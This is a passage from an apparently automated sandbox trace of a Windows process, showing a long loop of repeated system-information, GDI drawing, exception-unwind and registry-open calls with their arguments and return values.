dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.850] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.850] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.850] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.850] BeginPath (hdc=0x0) returned 0 [0087.850] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.850] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.850] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.850] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.850] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.850] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.850] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.850] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.850] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa70401d6 [0087.850] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa90401d3 [0087.850] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cbd [0087.850] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cbe [0087.850] CombineRgn (hrgnDst=0x1040cbd, hrgnSrc1=0xa70401d6, hrgnSrc2=0xa90401d3, iMode=1) returned 1 [0087.850] CombineRgn (hrgnDst=0x1040cbe, hrgnSrc1=0xa70401d6, hrgnSrc2=0xa90401d3, iMode=4) returned 2 [0087.850] CreateSolidBrush (color=0xff) returned 0x2100cbc [0087.850] CreateSolidBrush (color=0xff0000) returned 0x1100cbf [0087.850] DeleteObject (ho=0x1100cbf) returned 1 [0087.850] DeleteObject (ho=0xa90401d3) returned 1 [0087.850] DeleteObject (ho=0xa70401d6) returned 1 [0087.850] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.850] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.850] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.850] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.850] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.850] BeginPath (hdc=0x0) returned 0 [0087.850] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.851] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.851] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.851] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.851] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.851] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.851] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.851] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.851] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaa0401d3 [0087.851] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa80401d6 [0087.851] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc0 [0087.851] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc1 [0087.851] CombineRgn (hrgnDst=0x1040cc0, hrgnSrc1=0xaa0401d3, hrgnSrc2=0xa80401d6, iMode=1) returned 1 [0087.851] CombineRgn (hrgnDst=0x1040cc1, hrgnSrc1=0xaa0401d3, hrgnSrc2=0xa80401d6, iMode=4) returned 2 [0087.851] CreateSolidBrush (color=0xff) returned 0x2100cbf [0087.851] CreateSolidBrush (color=0xff0000) returned 0x1100cc2 [0087.851] DeleteObject (ho=0x1100cc2) returned 1 [0087.851] DeleteObject (ho=0xa80401d6) returned 1 [0087.851] DeleteObject (ho=0xaa0401d3) returned 1 [0087.851] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.851] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.851] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.851] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.851] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.851] BeginPath (hdc=0x0) returned 0 [0087.851] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.851] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.851] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.851] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.851] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.851] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.851] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.851] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.851] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa90401d6 [0087.852] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xab0401d3 [0087.852] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc3 [0087.852] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc4 [0087.852] CombineRgn (hrgnDst=0x1040cc3, hrgnSrc1=0xa90401d6, hrgnSrc2=0xab0401d3, iMode=1) returned 1 [0087.852] CombineRgn (hrgnDst=0x1040cc4, hrgnSrc1=0xa90401d6, hrgnSrc2=0xab0401d3, iMode=4) returned 2 [0087.852] CreateSolidBrush (color=0xff) returned 0x2100cc2 [0087.852] CreateSolidBrush (color=0xff0000) returned 0x1100cc5 [0087.852] DeleteObject (ho=0x1100cc5) returned 1 [0087.852] DeleteObject (ho=0xab0401d3) returned 1 [0087.852] DeleteObject (ho=0xa90401d6) returned 1 [0087.852] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.852] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.852] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.852] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.852] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.852] BeginPath (hdc=0x0) returned 0 [0087.852] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.852] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.852] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.852] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.852] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.852] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.852] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.852] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.852] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xac0401d3 [0087.852] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaa0401d6 [0087.852] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc6 [0087.852] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc7 [0087.852] CombineRgn (hrgnDst=0x1040cc6, hrgnSrc1=0xac0401d3, hrgnSrc2=0xaa0401d6, iMode=1) returned 1 [0087.852] CombineRgn (hrgnDst=0x1040cc7, hrgnSrc1=0xac0401d3, hrgnSrc2=0xaa0401d6, iMode=4) returned 2 [0087.852] CreateSolidBrush (color=0xff) returned 0x2100cc5 [0087.852] CreateSolidBrush (color=0xff0000) returned 0x1100cc8 [0087.852] DeleteObject (ho=0x1100cc8) returned 1 [0087.852] DeleteObject (ho=0xaa0401d6) returned 1 [0087.852] DeleteObject (ho=0xac0401d3) returned 1 [0087.852] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.852] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.853] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.853] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.853] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.853] BeginPath (hdc=0x0) returned 0 [0087.853] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.853] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.853] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.853] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.853] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.853] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.853] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.853] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.853] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xab0401d6 [0087.853] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xad0401d3 [0087.853] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc9 [0087.853] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cca [0087.853] CombineRgn (hrgnDst=0x1040cc9, hrgnSrc1=0xab0401d6, hrgnSrc2=0xad0401d3, iMode=1) returned 1 [0087.853] CombineRgn (hrgnDst=0x1040cca, hrgnSrc1=0xab0401d6, hrgnSrc2=0xad0401d3, iMode=4) returned 2 [0087.853] CreateSolidBrush (color=0xff) returned 0x2100cc8 [0087.853] CreateSolidBrush (color=0xff0000) returned 0x1100ccb [0087.853] DeleteObject (ho=0x1100ccb) returned 1 [0087.853] DeleteObject (ho=0xad0401d3) returned 1 [0087.853] DeleteObject (ho=0xab0401d6) returned 1 [0087.853] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.853] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.853] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.853] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.853] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.853] BeginPath (hdc=0x0) returned 0 [0087.853] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.853] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.853] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.853] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.853] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.853] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.854] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.854] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.854] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xae0401d3 [0087.854] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xac0401d6 [0087.854] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ccc [0087.854] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ccd [0087.854] CombineRgn (hrgnDst=0x1040ccc, hrgnSrc1=0xae0401d3, hrgnSrc2=0xac0401d6, iMode=1) returned 1 [0087.854] CombineRgn (hrgnDst=0x1040ccd, hrgnSrc1=0xae0401d3, hrgnSrc2=0xac0401d6, iMode=4) returned 2 [0087.854] CreateSolidBrush (color=0xff) returned 0x2100ccb [0087.854] CreateSolidBrush (color=0xff0000) returned 0x1100cce [0087.854] DeleteObject (ho=0x1100cce) returned 1 [0087.854] DeleteObject (ho=0xac0401d6) returned 1 [0087.854] DeleteObject (ho=0xae0401d3) returned 1 [0087.854] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.854] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.854] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.854] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.854] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.854] BeginPath (hdc=0x0) returned 0 [0087.854] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.854] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.854] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.854] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.854] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.854] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.854] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.854] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.854] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xad0401d6 [0087.854] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaf0401d3 [0087.854] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ccf [0087.854] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd0 [0087.854] CombineRgn (hrgnDst=0x1040ccf, hrgnSrc1=0xad0401d6, hrgnSrc2=0xaf0401d3, iMode=1) returned 1 [0087.854] CombineRgn (hrgnDst=0x1040cd0, hrgnSrc1=0xad0401d6, hrgnSrc2=0xaf0401d3, iMode=4) returned 2 [0087.855] CreateSolidBrush (color=0xff) returned 0x2100cce [0087.855] CreateSolidBrush (color=0xff0000) returned 0x1100cd1 [0087.855] DeleteObject (ho=0x1100cd1) returned 1 [0087.855] DeleteObject (ho=0xaf0401d3) returned 1 [0087.855] DeleteObject (ho=0xad0401d6) returned 1 [0087.855] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.855] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.855] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.855] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.855] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.855] BeginPath (hdc=0x0) returned 0 [0087.855] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.855] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.855] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.855] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.855] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.855] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.855] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.855] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.855] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb00401d3 [0087.855] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xae0401d6 [0087.855] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd2 [0087.855] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd3 [0087.855] CombineRgn (hrgnDst=0x1040cd2, hrgnSrc1=0xb00401d3, hrgnSrc2=0xae0401d6, iMode=1) returned 1 [0087.855] CombineRgn (hrgnDst=0x1040cd3, hrgnSrc1=0xb00401d3, hrgnSrc2=0xae0401d6, iMode=4) returned 2 [0087.855] CreateSolidBrush (color=0xff) returned 0x2100cd1 [0087.855] CreateSolidBrush (color=0xff0000) returned 0x1100cd4 [0087.855] DeleteObject (ho=0x1100cd4) returned 1 [0087.855] DeleteObject (ho=0xae0401d6) returned 1 [0087.855] DeleteObject (ho=0xb00401d3) returned 1 [0087.855] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.855] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.855] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.855] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.855] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.855] BeginPath (hdc=0x0) returned 0 [0087.855] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.855] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.856] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.856] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.856] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.856] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.856] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.856] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.856] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaf0401d6 [0087.856] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb10401d3 [0087.856] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd5 [0087.856] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd6 [0087.856] CombineRgn (hrgnDst=0x1040cd5, hrgnSrc1=0xaf0401d6, hrgnSrc2=0xb10401d3, iMode=1) returned 1 [0087.856] CombineRgn (hrgnDst=0x1040cd6, hrgnSrc1=0xaf0401d6, hrgnSrc2=0xb10401d3, iMode=4) returned 2 [0087.856] CreateSolidBrush (color=0xff) returned 0x2100cd4 [0087.856] CreateSolidBrush (color=0xff0000) returned 0x1100cd7 [0087.856] DeleteObject (ho=0x1100cd7) returned 1 [0087.856] DeleteObject (ho=0xb10401d3) returned 1 [0087.856] DeleteObject (ho=0xaf0401d6) returned 1 [0087.856] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.856] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.856] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.856] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.856] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.856] BeginPath (hdc=0x0) returned 0 [0087.856] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.856] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.856] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.856] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.856] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 